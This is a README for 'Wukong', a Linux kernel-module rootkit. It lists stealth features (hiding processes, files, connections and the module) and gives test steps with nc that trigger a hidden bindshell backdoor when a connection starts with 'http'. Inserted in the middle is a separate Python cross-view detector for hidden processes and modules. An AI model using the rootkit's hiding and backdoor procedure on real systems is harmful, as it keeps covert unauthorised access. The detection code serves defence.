Wukong: an LKM rootkit for Linux kernel 2.6.x, 3.x and 4.x
Note:
This kernel rootkit is just for educational purposes and should not be used for any illegal activities; use it at your own risk.
1. Function:
1. Hide Linux Process.
2. Hide TCP connection.
3. Hide File/Directory.
4. Hide wukong.ko.
5. Redirect TCP connection to backdoor server by using the specific confidential password.
2. Test step:
a. On the server:
cd wukong/
sudo ./install.pl
sudo nc -k -l 80
b. On the client:
nc 1.1.1.1 80
http
ifconfig
PS: The connection will be redirected to the bindshell.
nc 1.1.1.1 80
111111
PS: A RST will be received.
nc 1.1.1.1 80
111111
aaaaaa
PS: The connection will be handled by the real TCP 80 listener.
3. Result:
a. Bindshell file is hidden.
b. TCP 8000 connection is hidden.
c. Bindshell process is hidden.
d. wukong.ko is hidden.
e. If "http" is the first four bytes sent to TCP 80, the connection is established with the bindshell.
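A cross-view check a defender can run after the test above to see whether the process and module hiding hold up against more than one kernel interface. This is an added example and not part of Wukong; it uses the technique of tools such as unhide: each artifact is read through two views of the same kernel state and any discrepancy is reported. Process hiding is checked by comparing a readdir listing of /proc against direct lookup of every /proc/<pid> (non-leader thread ids are filtered out, since they are reachable by lookup but never listed); module hiding is checked by comparing /proc/modules against the /sys/module entries that carry an initstate attribute, which a module unlinked only from the kernel's module list often still has. The paths and the pid_max bound are assumptions about a standard Linux /proc and sysfs layout.

```python
import os

# Assumed standard locations; adjust if /proc or sysfs is mounted elsewhere.
PROC = "/proc"
SYS_MODULE = "/sys/module"


def listed_pids(proc=PROC):
    """PIDs visible when /proc is enumerated with readdir (the getdents
    path that process-hiding hooks typically filter)."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}


def _is_thread_group_leader(proc, pid):
    """True when /proc/<pid> belongs to a process rather than a non-leader
    thread.  Thread ids answer to lookup but are never listed by readdir,
    so they must not be reported as hidden."""
    try:
        with open(os.path.join(proc, str(pid), "status")) as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) == pid
    except OSError:
        return False  # the task exited between the lookup and the read
    return False


def probed_pids(proc=PROC, max_pid=None):
    """PIDs reachable by direct lookup of /proc/<pid>, which never goes
    through readdir.  max_pid defaults to the kernel's pid_max."""
    if max_pid is None:
        with open(os.path.join(proc, "sys", "kernel", "pid_max")) as fh:
            max_pid = int(fh.read().strip())
    return {pid for pid in range(1, max_pid + 1)
            if os.path.isdir(os.path.join(proc, str(pid)))
            and _is_thread_group_leader(proc, pid)}


def hidden_pids(listed, probed):
    """PIDs that answer to a direct lookup but are missing from the listing."""
    return sorted(probed - listed)


def module_names(proc_modules_text):
    """Module names from the text of /proc/modules (first column per line)."""
    return {line.split()[0] for line in proc_modules_text.splitlines() if line.strip()}


def listed_modules(path=os.path.join(PROC, "modules")):
    with open(path) as fh:
        return module_names(fh.read())


def sysfs_modules(path=SYS_MODULE):
    """Loaded modules according to sysfs.  Only loadable modules get an
    'initstate' attribute, so built-in code is excluded by that test."""
    return {name for name in os.listdir(path)
            if os.path.exists(os.path.join(path, name, "initstate"))}


def hidden_modules(listed, sysfs):
    """Modules with a sysfs entry that /proc/modules (and so lsmod) omits."""
    return sorted(sysfs - listed)


def run_checks(max_pid=None):
    """Run both cross-view checks on the live system and return the findings.
    /proc is listed before and after the probe so a process that starts
    during the (slow) probe is not reported as hidden."""
    before = listed_pids()
    probed = probed_pids(max_pid=max_pid)
    after = listed_pids()
    return {
        "hidden_pids": hidden_pids(before | after, probed),
        "hidden_modules": hidden_modules(listed_modules(), sysfs_modules()),
    }


if __name__ == "__main__":
    for key, value in run_checks().items():
        print(f"{key}: {value if value else 'none found'}")
```

Run it as root for a complete view of /proc. The probe walks the whole pid range, which can be as large as 4194304 on 64-bit systems, so pass a smaller max_pid for a quick pass. A module that also hooks the lookup path, or that removes its sysfs kobject as well as its module-list entry, will not show up in these two views; treat an empty result as one data point, not a verdict.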
Tested OS:
CentOS-5.5-i386-bin-DVD.iso
Linux 2.6.18-408.el5 #1 SMP Tue Jan 19 09:13:33 EST 2016 i686 i686 i386 GNU/Linux
CentOS-5.5-x86_64-bin-DVD
Linux 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
ubuntu-14.04.2-desktop-i386.iso
Linux 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
ubuntu-14.04.2-desktop-amd64.iso
Linux 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
ubuntu-14.04.3-desktop-i386.iso
Linux 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
ubuntu-14.04.3-desktop-amd64.iso
Linux 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
ToDo:
Do performance tuning so that it can work on Linux servers with heavy traffic.
Add more features.